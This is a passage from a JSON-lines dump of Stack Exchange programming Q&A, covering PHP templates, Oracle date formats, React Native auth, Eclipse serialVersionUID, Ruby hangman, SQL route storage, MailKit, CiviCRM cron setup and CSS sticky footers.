$this->Config->rating_scale, 'user');\n $rating_value = $Rating->round($review['Rating']['average_rating'],$this->Config->rating_scale);\n ?>\n <div class=\"jrOverallUser\" title=\"<?php __t(\"User rating\"); ?>\">\n <div class=\"jrRatingStars\"><?php echo $rating_stars ?><\/div>\n <span class=\"jrRatingValue\"><?php echo $rating_value?><\/span>\n <\/div>\n <?php endif;?>\n <\/div>\n <?php endif;?>\n\n <!-- Reviewer name -->\n <div class=\"jrModuleItemReviewer\">\n <span class=\"reviewer\"><?php __t(\"Reviewed by\");?> <?php echo $Community->screenName($review);?><\/span>\n <\/div>\n\n <?php if($fields): ?>\n\n <!-- Custom Fields -->\n <div class=\"jrModuleFields\">\n\n <?php\n foreach ($fields as $field):\n $field = trim($field);\n $field_value = $CustomFields->field($field,$review);\n ?>\n <?php if($field_value != ''):?>\n <div class=\"jrModuleFieldDiv <?php echo lcfirst(Inflector::camelize($field)); ?>\">\n <span class=\"jrModuleFieldTitle\"><?php echo $CustomFields->label($field, $review); ?>: <\/span>\n <span class=\"jrModuleFieldValue\"><?php echo $field_value; ?><\/span>\n <\/div>\n <?php endif;?>\n\n <?php endforeach; ?>\n\n <\/div>\n\n <?php endif;?>\n\n <?php if($show_comments && trim($review['Review']['comments'])!=''):?>\n <!-- Review Comments -->\n <div class=\"jrModuleItemInfo\">\n <?php\n \/\/ Uncomment line below to show review title\n \/\/ echo '<strong>' . $review['Review']['title'] . '<\/strong><br \/>';\n ?>\n <span class=\"comments\">\"<?php echo $Text->truncateWords($review['Review']['comments'],$comments_words,'...');?>\"<\/span>\n <\/div>\n <?php endif;?>\n <\/div>\n\n <?php if($tn_show && $mainMediaThumb && $tn_position == 'bottom'):?>\n\n <!-- Listing Thumbnail -->\n <div class=\"jrModuleItemThumbnail\">\n <?php echo $Html->sefLink($mainMediaThumb,$review['Listing']['url']);?>\n <?php \/\/ Uncomment line below to show reviewer avatar. You can comment or remove the thumbnail code above\n \/\/ echo $Community->avatar($review);\n ?>\n <\/div>\n\n <?php endif;?>\n\n <\/div>\n\n <?php \/*end of row , start new row*\/\n if(!empty($page) && ($i == $columns || $total == $j)):?>\n <div class=\"jrDivider\"><\/div>\n <?php $i=0; endif;?>\n\n <?php endwhile;?>\n\n <\/div>\n\n <?php endforeach; \/* new page ends here *\/?>\n\n<\/div><?php \/* end items root element *\/?>\n<\/code>\n\nDoes any one have the slightest idea how i could turn this into a for loop that outputs a table?\nComment: You **might** be able to hack something together with output buffering and regex to replace divs with table cells, but i expect you will find it easier to just plough through the above code and replace the divs with tables\nComment: Thanks very much for the answer, yeah i've been edit the divs trying to render a table, but its driving me mad at the moment ha,\nAnswer: The quickest path from A to B is to edit the attached code to render a table versus stacked divs.\n* EDIT *\nThe answer to your comment isn't so simple as replace all of 'A' with 'B.' A div is a \"self-contained\" HTML element while a table is a grouping with syntax rules.\nAn HTML table is constructed like so:\n<code><table>\n <thead>\n <tr>\n <th>Header 1<\/th>\n <th>Header 2<\/th>\n <\/tr>\n <\/thead> \n <tbody>\n <tr>\n <td>Row 1 - Column 1<\/td>\n <td>Row 1 - Column 2<\/td>\n <\/tr>\n <tr>\n <td>Row 2 - Column 1<\/td>\n <td>Row 2 - Column 2<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<\/code>\nThe foreach loop in your code should create a row through each iteration. Which means you need to render your table, thead and tbody tags outside of this looping code. Inside the loop, you render a new row each iteration, which requires an opening\/closing tag for the row and an opening\/closing for each column.\nHope this helps.\nComment: Thanks, but do i just go in and add at each div? lol seems to simple and messy thanks for your time\n","meta":{"source":"stackoverflow","title":"Editing a php scrip\u00e8t divs to output a table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generating date in Oracle using prepared statements\n\nQuestion: I have an interesting problem here. I'm trying to generate an XML date using the Oracle <code>to_char<\/code> command. When I do this using PL\/SQL everything works fine:\n<code>18:05:54 SQL> select to_char(sysdate, 'yyyy-mm-dd\"T\"hh24:mi:ss\".000Z\"') from dual;\n\nTO_CHAR(SYSDATE,'YYYY-MM-DDT\n---------------------------------------------------------------------------\n2014-04-10T23:09:50.000Z\n<\/code>\nHowever, when I put that date format into a Java program and use a prepared statement it throws a very strange and meaningless error of \"Missing IN OUT parameter at index:: 6\" which is strange because there are only 5 parameters. I know it is the date format because if I alter the format the command works fine.\nHere is my date format string and the one that works:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MM:SS\\\"Z\\\")\"; <-- BROKEN\n\nprivate static final String XML_DATE = \", 'YYYY-MM-DD HH24:MM:SS')\"; <-- Working\n<\/code>\nYou may notice that I needed to escape the quotation marks to keep them in the string.\nA little additional information. This string is inserted in-line from the main prepared statement. That's why it looks a little funny. So each line of my SQL statement looks like this:\n<code> \" NVL(to_char(flt.my_date_dtm\" + XML_DATE + \",'') my_date_dtm, \" +\n<\/code>\nThe actual error tossed is this:\n<code>java.sql.SQLException: Missing IN or OUT parameter at index:: 6\n<\/code>\nAgain, which is strange because there are 5 parameters. Anybody have any ideas as to why it's doing this?\nAnswer: You're missing a closing single-quote in the 'broken' one:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MM:SS\\\"Z\\\")\";\n ^\n<\/code>\nYou've also changed <code>MI<\/code> to <code>MM<\/code> in both the broken and working one versions. So it should be:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MI:SS\\\"Z\\\"')\";\n<\/code>\nNot sure if you've intentionally left out the <code>.000<\/code> part.\nI think that's throwing the parsing off and it's making a colon later in the constructed string be interpreted as a bind variable. As you aren't getting a missing-quote error you're presumably using this format twice in the final string (or an even number of times, anyway) so overall you do end up with valid strings. Kind of - long and meaningless, but with balanced quotes at least...\nWhen I see an error like that and can't immediately spot the problem, I usually write the final string out to console and try to run that through SQL*Plus, which tends to make the problem rather more obvious.\nComment: OMG! Thank you! You don't know how many people I've had look at this stupid statement and could not find that. Always helpful to have another pair of eyes!\nComment: \"and it's making a colon later in the constructed string be interpreted as a bind variable\"...\n\nOk, this solved my issue. I took the ' characters out of my prepared statement and my bind variables magically started working properly. Amazing!\n","meta":{"source":"stackoverflow","title":"Generating date in Oracle using prepared statements","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use BuiltInParameters in react-native-app-auth to display auth screen in full screen\n\nQuestion: React native have library for external auth provide & below is configuration:-\n<code>import {\n authorize,\n} from 'react-native-app-auth';\nconst config = {\n issuer: 'https:\/\/xxxx.com:xxxx\/',\n clientId: 'xxxxx-ipad-local', \n redirectUrl: 'com.oms:\/oauthredirect',\n scopes: ['openid', 'profile', 'email', 'roles'],\n additionalParameters: {\n display : \"page\"\n }\n};\n<\/code>\nAsk is to show auth login screen to full screen as shown in options below from library which is not working. :-\n\nCan the login window which appears from library https:\/\/github.com\/FormidableLabs\/react-native-app-auth is customisable, As per library there are some option as shown in ablove screenshot but seems not working. Any clue will be really appreciated.\nAnswer: Check the options.\n<code>iosCustomBrowser?: 'safari' | 'chrome' | 'opera' | 'firefox';\nandroidAllowCustomBrowsers?: ('chrome' | 'chromeCustomTab' | 'firefox' | 'firefoxCustomTab' | 'samsung' | 'samsungCustomTab')[]\n<\/code>\nYour config will be like this for iOS as an example:\n<code>const config = {\n issuer: 'https:\/\/xxxx.com:xxxx\/',\n clientId: 'xxxxx-ipad-local', \n \/\/ iOS requires a trailing slash on redirectUrl\n redirectUrl: 'com.oms:\/oauthredirect\/',\n scopes: ['openid', 'profile', 'email', 'roles'],\n additionalParameters: {\n display : \"page\"\n },\n iosCustomBrowser: 'safari'\n};\n<\/code>\nThis will open the website in Safari with the same behaviour <code>Linking<\/code> opens a URL. You'll have to manage the redirect back to your app when you complete the authentication.\n","meta":{"source":"stackoverflow","title":"How to use BuiltInParameters in react-native-app-auth to display auth screen in full screen","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there a way to re-generate a serialVersionUID in Eclipse?\n\nQuestion: I know that Eclipse can create a new <code>serialVersionUID<\/code> when you don't yet have one, but I'm looking for a way to generate a new one after you made some changes.\nUnlike this question, I'm not looking for a tool to have it changed by itself, but rather a menu item \/ hotkey that does the trick. Anything faster than removing it and let Eclipse generate a new one would do.\nI'm aware of this Ant tool, but I prefer something in Eclipse.\nComment: ... and if you want to change it only sometimes, you can just make a random modification to this number -- assuming you do not release more often than once a day, this should be safe enough.\nComment: If you want it to change whenever you make some changes to the class then just remove it. serialVersionUID is intended for when you do not want it to change when you change the definition of the class.\nComment: I want it to change only when I make changes that affect the serializability.\nComment: Good point, that would be an acceptable answer in fact, didn't think of that.\nComment: @BevynQ `serialVersionUID` is intended as a way to version your class definitions, reliably, across compilers\/environments\/etc. Whether or not that matters depends on how serialization is being used, and whether or not the changes affect ser\/deser.\nComment: The answer is given so I can only give you a recommendation. Assuming you don't have releases every hour why do you even care if you break serializability _in between_ releases? You'll want to make sure the serialVersionUID changes when you release, though. Spring for example references a constant from all their serialVersionUIDs and the constant value is...the release version. I'm sure it gets updated automatically before the code is compiled during a release build.\nAnswer: Sadly, I do not know of any such plug-in available.\nHowever, the Ant tool you could create a single Ant script to modify your projects, and you can add that script either as an External tool (runnable from the menu of a project) or even as an incremental builder (that needs more time to set up correctly).\nI wrote a blog post some time ago, when I used an Ant script to generate code from EMF models automatically when the source models change. That script works fine in our codebase with a single known issue: the build is sometimes triggered unexpectedly...\nComment: Is it possible to use the Ant script for a single class?\nComment: Yes, it is. You can set properties using workspace variables - those variables can e.g. define the selected file for the Ant script.\n","meta":{"source":"stackoverflow","title":"Is there a way to re-generate a serialVersionUID in Eclipse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I mask out letters that don't match what's expected?\n\nQuestion: My goal is to create a game of hangman. I wrote code similar to this:\n<code>c = []\nplayers_guess = gets\nb = \"example\"\nb.scan(\/.\/) {|letter| c << letter}\n\nc.each do |letter|\n if letter == players_guess\n puts letter\n else\n puts \"*\"\n end\nend \n<\/code>\nThe code checks if the player guessed the right letter from the password hidden in variable <code>c<\/code>, and then displays the password hidden behind the <code>*<\/code>s and only revealed guessed letters. But when I run the program, the result is always the same, it displays <code>players_guess<\/code>, and then gives seven <code>*<\/code>. What is wrong here?\nComment: What is wrong is your expectation that something different would happen :) What hint do you need?\nComment: i expected eg if players_guess = \"e\" it will display \"e*****e\". but it gives \"e*******\". and it displays the players_guess at the beginning like this no matter what letter or number i choose:(\nAnswer: Here's a simple way to do what you want:\n<code>word = \"example\"\nputs \"Type a letter: \"\nguess = gets.chomp\nputs word.tr(\"^#{guess}\", \"*\")\n<\/code>\nThis uses the <code>String#tr<\/code> method to replace all but the guess to <code>*<\/code>.\nThe output if you typed <code>e<\/code> would be <code>e*****e<\/code>.\nAnswer: Your If\/Then Logic is Wrong\nYour code is as follows:\n<code>c.each do |letter|\n if letter == players_guess\n puts letter\n else\n puts \"*\"\n end\nend\n<\/code>\nThe conditional will generally be false, since no single letter is likely to match the entire line retrieved by <code>gets<\/code>. As a result, you get an asterisk printed for each letter in c.\nSome Options to Fix Your Code\nYou can do a couple of things here.\n\nJust show the string if the strings are equal.\n<code>puts players_guess if b == players_guess.chomp\n<\/code>\nUse a counter in your loop to index into your arrays or strings.\n\nhttp:\/\/www.ruby-doc.org\/core-1.9.3\/String.html#method-i-index\nhttp:\/\/www.ruby-doc.org\/core-1.9.3\/Array.html#method-i-5B-5D\n\nSplit both strings into an array, and compare the arrays, printing letters that match or an asterisk on a non-match.\n<code>c.each_with_index do |char, idx|\n puts char == players_guess.scan(\/.\/)[idx] ? char : '*'\nend\n<\/code>\nComment: i don't know the methods you used here, but thanks anyway, i will do my best researching:)\n","meta":{"source":"stackoverflow","title":"How do I mask out letters that don't match what's expected?","dup_signals":{}},"subset":"stackexchange"} +{"text":"storing latitude and longitude for a route\n\nQuestion: I want to store a bunch of routes which consists of a pair of latitude and longitude series in a database. I want to be able to get all the routes for a given key.\nThe way my table is set up now is the following:\nRouteID Order Latitude Longitude\nbut a route can have many sets of latitude and longitude, so it becomes:\n<code>RouteID Order Latitude Longitude\n1 0 X Y\n1 1 X Y\n1 2 X Y\n1 3 X Y\n1 4 X Y\n2 0 X Y \n2 1 X Y \n<\/code>\nI have another table called R, which has RouteID and it references to this Route table.\nThe question is:\n1. Does this seems reasonable?\n\nIf not what is a better way of doing this\n\nUPDATE:\nSo the other table is called TEMP and it has the following format\nTempID RouteID UserID AttributeX AttributeY\nwhen I do a SQL:\n<code>SELECT R.LATITUDE, R.LONGITUDE\nFROM TEMP T, ROUTE R\nWHERE T.UserID =1\nORDER BY R.ORDER ASC ;\n<\/code>\nAnd in my table currently UserID 1 has two routes, but it prints out each lattitude twice.\nIs my SQL wrong? \nAnswer: This looks OK to me. \nBut don't pollute the world with a table named <code>R<\/code>. Think about the guy coming after you, what does <code>R<\/code> mean?\nThe other table should probably be named <code>Routes<\/code> and this table should probably be named <code>RoutePoints<\/code> or just <code>Points<\/code> or something else informative.\nAnd for the SQL, you have used a <code>CROSS JOIN<\/code> when you want to use a <code>INNER JOIN<\/code>:\n<code>SELECT R.LATITUDE, R.LONGITUDE\nFROM TEMP T INNER JOIN ROUTE R ON T.ROUTEID = R.ROUTEID\nWHERE T.UserID =1\nORDER BY R.ORDER ASC\n<\/code>\nThat might work.\nComment: Yea.. I just put R as an example here.\nComment: Good to hear! You had me worried there. But the structure looks fine! If you need additional fields, such as a calculated distance between the points - add them later!\nComment: I updated my question... mind helping out? My SQL skill is rusty\nComment: If I also want to see username\/userid then username\/userid will be shown for every column?. So this table is not 3NF?\nAnswer: Most likely you want to use a space-filling-curve or a spatial index. I use it to store postcode and query them with just 1 operator indepedent of the zoom-level. You are welcome to download my class at phpclasses.org ( hilbert-curve ).\nAnswer: A lot of it depends on what you want to do with this information after you have stored it. If you just want to print out a map for a given route, your table setups could be ok. If you wanted to know if two routes intersected or overlapped, you should probably learn more about Geogrpahic Information Systems (GIS). GIS Stackexchange is a good place to start asking questions.\n","meta":{"source":"stackoverflow","title":"storing latitude and longitude for a route","dup_signals":{}},"subset":"stackexchange"} +{"text":"filter default folder from Mailkit\/IMailFolder\n\nQuestion: I am trying to get all required folder using Mailkit\/IMailFolder. It gives me some unwanted folder like \"Calendar, Contacts etc.\", Is there any good way to filter that folder? because in such folder there is no email available and it is no use for me also it is not created by me it is default folders. \nI am using folder.GetSubfolders(false) method in c#. below is my code.\n<code>static List<IMailFolder> GetFolders(IMailFolder personal = null)\n {\n try\n {\n if (personal == null)\n {\n personal = MailManager.Instance.ImapClient.GetFolder(MailManager.Instance.ImapClient.PersonalNamespaces[0]);\n }\n return personal.GetSubfolders(false).ToList();\n }\n catch (Exception ex)\n {\n return null;\n }\n\n }\n<\/code>\nAnswer: You could use the following code snippet (which uses LINQ):\n<code>return personal.GetSubfolders (false).Where (x => X.Name != \"Calendar\" && x.Name != \"Contacts\").ToList ();\n<\/code>\nComment: Nope, because the IMAP protocol does not have any such property either.\nComment: Thanks for your reply. I want to know, Do we have any property available in IMailFolder which differentiate folder created by user and default?\n","meta":{"source":"stackoverflow","title":"filter default folder from Mailkit\/IMailFolder","dup_signals":{}},"subset":"stackexchange"} +{"text":"New install, system status says \"cron not running\" and \"timestamp mismatch\"\n\nQuestion: Running CiviCRM 4.7 on WordPress 4.7.3, hosted on a shared Linux server at 1and1.com. The WordPress site is using PHP 7.0 but apparently the latest version I can use from the command line is 5.5.\nTwo problems (perhaps related?)\nThe system status screen says \"Cron not running\". Cron is running. I currently have crontab sending me an email every 15 minutes using the cronTest.php file which contains this:\n<code><?php mail('firstname.lastname@example.com','Cron Job Test Script',phpversion()); ?>\n<\/code>\nThat is working, sending me the email and reporting PHP version 5.5.38.\nI'm also trying to use cli.php to execute the CiviCRM Job, but that doesn't seem to be working.\nHere's my whole crontab (with sensitive info changed):\n<code>*\/15 * * * * \/usr\/bin\/php5.5 \/mysharedserver\/homepages\/34\/d11111111\/htdocs\/cronTest.php\n*\/15 * * * * \/usr\/bin\/php5.5 \/mysharedserver\/homepages\/34\/d11111111\/htdocs\/mysubdir\/wp-content\/plugins\/civicrm\/civicrm\/bin\/cli.php -s mydomain.org -u cronuser -p cronuserpassword -e Job -a execute\n<\/code>\nI have also tried wget in crontab without success:\n<code>0 * * * * wget -O - -q -t 1 'http:\/\/mydomain.org\/wp-content\/plugins\/civicrm\/civicrm\/bin\/cron.php'?name=cronuser&pass=cronuserpassword@&key=mysitekey\n<\/code>\nI also tried wget with the single quote after the site key.\nThe timestamp error in CiviCRM system status says:\n<code>Timestamps reported by MySQL (eg \"2017-04-11 14:58\") and PHP (eg \"2017-04-11 18:58\" ) are mismatched\n<\/code>\nI have checked the PHP time using <code>date_default_timezone_get()<\/code> in the folder where WordPress is installed, and using SQL <code>CURTIME()<\/code> and <code>CURDATE()<\/code>, the times and dates match -- both show the time and date in New York. I have also created a php.ini in the directory where WordPress is running, with a directive setting the time to America\/New York:\n<code>date.timezone = \"America\/New_York\"\n<\/code>\nSo CiviCRM must be getting its PHP time somewhere other than in the directory where WordPress is installed? I thought maybe that would be the directory where PHP 5.5 is running, so I tried running the PHP function date_default_timezone_get() in \/usr\/bin\/php5.5 and got:\n<code>X-Powered-By: PHP\/5.5.38 Content-type: text\/html date_default_timezone_set: America\/New_York\n<\/code>\nUsing this SQL command:\n<code>SELECT @@global.time_zone, @@session.time_zone\n<\/code>\nI get SYSTEM for both values. I haven't pursued the SQL question any further than that, since the SQL time seems correct (New York time). \nI'm looks to me like the PHP time is the problem, but I'm not sure where to go from here.\nComment: Welcome! Although these both relate to your new installation this would be better asked as two separate questions, maybe with a link in each to the other.\nAnswer: The first thing I would check is the TimeZone setting in WP. Go to Settings--> General. That cannot be the default (UTC +0) as the default does not exist in php (UTC does, but not UTC +0). That should solve the TZ mismatch. Best to use one of these - http:\/\/php.net\/manual\/en\/timezones.america.php for NY I'd use <code>America\/New_York<\/code>\nAs far as cron, I recommend that you set it using the wp-cli method as detailed here: https:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Managing+Scheduled+Jobs\nComment: Timestamp suggestion worked. Thank you! Still working on wp-cli. Tried to include additional questions in my original question but not sure if you could see it, so left my questions as a separate answer, too. Any help will be greatly appreciated.\nComment: Have put my wp-cli questions in a new post: http:\/\/civicrm.stackexchange.com\/questions\/18119\/cron-not-running-but-it-is-trying-to-use-wp-cli-in-crontab-with-wordpress\n","meta":{"source":"civicrm.stackexchange","title":"New install, system status says \"cron not running\" and \"timestamp mismatch\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sticky Footer not fully stick on the bottom\n\nQuestion: I'm trying to add a sticky footer on my two-column content but the problem is it can't really fully occupy the bottom part of the page. \nI've been applying css sticky footer I found in the web but I can't make it to work. \nI've attached my code below.\nCodepen code here: I've add my code into Codepen Here\n\n<code><style> body {\n margin: 0;\n padding: 0;\n \/*background-image: url(\"main-bg.jpg\");*\/\n background-color:green;\n height: 100%;\n}\n.container {\n width: 100%;\n position: relative;\n margin-bottom: -50px;\n height: 100%;\n}\n\/* HEADER SECTION *\/\n\n.header {\n background-color:blue;\n \/*background-image: url(\"bgs.jpg\");\n background-repeat: repeat;\n background-size: cover;\n *\/\n height: 100px;\n overflow: auto;\n}\n.header ul {\n list-style-type: none;\n margin: 0;\n padding: 0;\n}\n.header ul li {\n float: right;\n padding: 14px 16px;\n}\n.header li ul {\n display: none;\n}\n.header a {\n text-decoration: none;\n color: white;\n font-size: 20px;\n}\n.header li:hover ul {\n display: block;\n}\n\/*FOOTER SECTION*\/\n\n.footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 50px;\n}\n.footer-right {\n float: right;\n}\n.footer-left {\n float: left;\n}\n\/*CONTENT SECTION*\/\n\n.content {\n padding: 10px;\n padding-bottom: 50px;\n height: 100%;\n overflow: hidden;\n background-color:silver;\n width: 95%;\n}\n.left-content {\n float: left;\n width: 800px;\n padding: 10px;\n margin-left: 150px;\n margin-right: 20px;\n margin-top: 20px;\n margin-bottom: : 150px;\n \/*background-image:url(\"main-content-bg.png\");*\/\n background-color: white;\n -webkit-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n -moz-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n}\n.right-content {\n float: right;\n width: 320px;\n padding: 10px;\n background: #99c;\n}\n#footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 40px;\n}\n<\/style><\/code>\n<code><body>\n\n <div class=\"container\">\n\n <div class=\"header\">\n <br>\n <ul>\n <li><a href=\"#\">HOME<\/a>\n <\/li>\n <li><a href=\"#\">SERVICES<\/a>\n <\/li>\n <li><a href=\"#\">PORTFOLIO<\/a>\n <ul>\n <li><a href=\"#\">Birthday Events<\/a>\n <\/li>\n <li><a href=\"#\">Wedding Events<\/a>\n <\/li>\n <li><a href=\"#\">Anniversary Events<\/a>\n <\/li>\n <li><a href=\"#\">Other Events<\/a>\n <\/li>\n <\/ul>\n <\/li>\n <li><a href=\"#\">CONTACT<\/a>\n <\/li>\n <li><a href=\"#\">ABOUT<\/a>\n <\/li>\n <\/ul>\n <\/div>\n\n <div class=\"content\">\n <div class=\"left-content\">\n <p>All About Pixel Foto<\/p>\n <p>Nunc tincidunt, elit non cursus euismod, lacus augue ornare metus, egestas imperdiet nulla nisl quis mauris. Suspendisse a pharetra urna. Morbi dui lectus, pharetra nec elementum eget, vulputate ut nisi. Aliquam accumsan, nulla sed feugiat vehicula,\n lacus justo semper libero, quis porttitor turpis odio sit amet ligula. Duis dapibus fermentum orci, nec malesuada libero vehicula ut. Integer sodales, urna eget interdum eleifend, nulla nibh laoreet nisl, quis dignissim mauris dolor eget mi.\n Donec at mauris enim. Duis nisi tellus, adipiscing a convallis quis, tristique vitae risus. Nullam molestie gravida lobortis. Proin ut nibh quis felis auctor ornare. Cras ultricies, nibh at mollis faucibus, justo eros porttitor mi, quis auctor\n lectus arcu sit amet nunc. Vivamus gravida vehicula arcu, vitae vulputate augue lacinia faucibus. Donec volutpat nibh sit amet libero ornare non laoreet arcu luctus. Donec id arcu quis mauris euismod placerat sit amet ut metus. Sed imperdiet\n fringilla sem eget euismod. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque adipiscing, neque ut pulvinar tincidunt, est sem euismod odio, eu ullamcorper turpis nisl sit amet velit.\n Nullam vitae nibh odio, non scelerisque nibh. Vestibulum ut est augue, in varius purus. Quisque ligulas ipsum, euismod atras vulputate iltricies etri elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\n Nulla nunc dui, tristique in semper vel, congue sed ligula. Nam dolor ligula, faucibus id sodales in, auctor fringilla libero. Pellentesque pellentesque tempor tellus eget hendrerit. Morbi id aliquam ligula. Aliquam id dui sem. Proin rhoncus\n consequat nisl, eu ornare mauris tincidunt vitae. Vestibulum sodales ante a purus volutpat euismod. Proin sodales quam nec ante sollicitudin lacinia. Ut egestas bibendum tempor. Morbi non nibh sit amet ligula blandit ullamcorper in nec risus.\n Pellentesque fringilla diam faucibus tortor bibendum vulputate. Etiam turpis urna, rhoncus et mattis ut, dapibus eu nunc. Nunc sed aliquet nisi. Nullam ut magna non lacus adipiscing volutpat. Aenean odio mauris, consectetur quis consequat quis,\n blandit a nunc. Sed orci erat, placerat ac interdum ut, suscipit eu augue. Nunc vitae mi tortor. Ut vel justo quis lectus elementum ullamcorper volutpat vel libero.<\/p>\n <\/div>\n <div class=\"right-content\">\n <p align=\"center\">All About Me<\/p>\n <p>I'm Dick Roman and I foresee what I will become when I first time use a camera. I was eager to have my own camera and take elegant photos of my unforgettable moments in my life. It was served as my inspiration to purse and take this field of photography.\n Today I am able to render my services to my clients and I will guarantee every works I made will be best of the best<\/p>\n <ol style=\"list-style-type:none;align:center\">\n <p>Today I am rendering my skills as a:<\/p>\n <li>Image Editor<\/li>\n <li>Landscape Photograher<\/li>\n <li>Video Editor<\/li>\n <li>Web Designer<\/li>\n <\/ol>\n\n <p align=\"center\">You could drop-by to my social media profiles<\/p>\n <p align=\"center\">Just click on any links below to visit my account<\/p>\n\n <ul style=\"list-style-type:none\">\n <li>\n <a href=\"#\">Facebook<\/a>\n <\/li>\n <li><a href=\"#\">Twitter<\/a>\n <\/li>\n <li><a href=\"#\">Instagram<\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/div>\n\n <div class=\"footer\">\n <div class=\"footer-left\">\n <p>©Copyright 2016 - Codeblocks Design<\/p>\n <\/div>\n\n\n <div class=\"footer-right\">\n <p>\n <a href=\"#\">\n <img src=\"fb.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"twitter.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"instagram.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"google.png\" height=\"60%\">\n <\/a>\n <\/p>\n <\/div>\n <\/div>\n\n <\/div>\n<\/body><\/code>\n\n\n\nHow the code above displayed on my browser:\nHere's the output\nComment: This has been answered [here](http:\/\/stackoverflow.com\/q\/42294\/5819195)\nAnswer: Remove <code><style><\/code> from your css it's invalid <code>selector<\/code>.\nFor sticky footer use <code>position:fixed<\/code> will make it stick to the bottom of the screen.\nHere is modified snippet.\n\n<code>*{\n margin:0px;\n padding:0px;\n}\n\nbody {\n margin: 0;\n padding: 0;\n \/*background-image: url(\"main-bg.jpg\");*\/\n background-color:green;\n height: 100%;\n}\n.container {\n width: 100%;\n position: relative;\n margin-bottom: -50px;\n height: 100%;\n}\n\/* HEADER SECTION *\/\n\n.header {\n background-color:blue;\n \/*background-image: url(\"bgs.jpg\");\n background-repeat: repeat;\n background-size: cover;\n *\/\n height: 100px;\n overflow: auto;\n}\n.header ul {\n list-style-type: none;\n margin: 0;\n padding: 0;\n}\n.header ul li {\n float: right;\n padding: 14px 16px;\n}\n.header li ul {\n display: none;\n}\n.header a {\n text-decoration: none;\n color: white;\n font-size: 20px;\n}\n.header li:hover ul {\n display: block;\n}\n\/*FOOTER SECTION*\/\n\n.footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 50px;\n}\n.footer-right {\n float: right;\n}\n.footer-left {\n float: left;\n}\n\/*CONTENT SECTION*\/\n\n.content {\n padding: 10px;\n padding-bottom: 50px;\n height: 100%;\n overflow: hidden;\n background-color:silver;\n width: 95%;\n}\n.left-content {\n float: left;\n width: 800px;\n padding: 10px;\n margin-left: 150px;\n margin-right: 20px;\n margin-top: 20px;\n margin-bottom: : 150px;\n \/*background-image:url(\"main-content-bg.png\");*\/\n background-color: white;\n -webkit-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n -moz-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n}\n.right-content {\n float: right;\n width: 320px;\n padding: 10px;\n background: #99c;\n}\n#footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 40px;\n}\n<\/style><\/code>\n<code><body>\n\n <div class=\"container\">\n\n <div class=\"header\">\n <br>\n <ul>\n <li><a href=\"#\">HOME<\/a>\n <\/li>\n <li><a href=\"#\">SERVICES<\/a>\n <\/li>\n <li><a href=\"#\">PORTFOLIO<\/a>\n <ul>\n <li><a href=\"#\">Birthday Events<\/a>\n <\/li>\n <li><a href=\"#\">Wedding Events<\/a>\n <\/li>\n <li><a href=\"#\">Anniversary Events<\/a>\n <\/li>\n <li><a href=\"#\">Other Events<\/a>\n <\/li>\n <\/ul>\n <\/li>\n <li><a href=\"#\">CONTACT<\/a>\n <\/li>\n <li><a href=\"#\">ABOUT<\/a>\n <\/li>\n <\/ul>\n <\/div>\n\n <div class=\"content\">\n <div class=\"left-content\">\n <p>All About Pixel Foto<\/p>\n <p>Nunc tincidunt, elit non cursus euismod, lacus augue ornare metus, egestas imperdiet nulla nisl quis mauris. Suspendisse a pharetra urna. Morbi dui lectus, pharetra nec elementum eget, vulputate ut nisi. Aliquam accumsan, nulla sed feugiat vehicula,\n lacus justo semper libero, quis porttitor turpis odio sit amet ligula. Duis dapibus fermentum orci, nec malesuada libero vehicula ut. Integer sodales, urna eget interdum eleifend, nulla nibh laoreet nisl, quis dignissim mauris dolor eget mi.\n Donec at mauris enim. Duis nisi tellus, adipiscing a convallis quis, tristique vitae risus. Nullam molestie gravida lobortis. Proin ut nibh quis felis auctor ornare. Cras ultricies, nibh at mollis faucibus, justo eros porttitor mi, quis auctor\n lectus arcu sit amet nunc. Vivamus gravida vehicula arcu, vitae vulputate augue lacinia faucibus. Donec volutpat nibh sit amet libero ornare non laoreet arcu luctus. Donec id arcu quis mauris euismod placerat sit amet ut metus. Sed imperdiet\n fringilla sem eget euismod. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque adipiscing, neque ut pulvinar tincidunt, est sem euismod odio, eu ullamcorper turpis nisl sit amet velit.\n Nullam vitae nibh odio, non scelerisque nibh. Vestibulum ut est augue, in varius purus. Quisque ligulas ipsum, euismod atras vulputate iltricies etri elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\n Nulla nunc dui, tristique in semper vel, congue sed ligula. Nam dolor ligula, faucibus id sodales in, auctor fringilla libero. Pellentesque pellentesque tempor tellus eget hendrerit. Morbi id aliquam ligula. Aliquam id dui sem. Proin rhoncus\n consequat nisl, eu ornare mauris tincidunt vitae. Vestibulum sodales ante a purus volutpat euismod. Proin sodales quam nec ante sollicitudin lacinia. Ut egestas bibendum tempor. Morbi non nibh sit amet ligula blandit ullamcorper in nec risus.\n Pellentesque fringilla diam faucibus tortor bibendum vulputate. Etiam 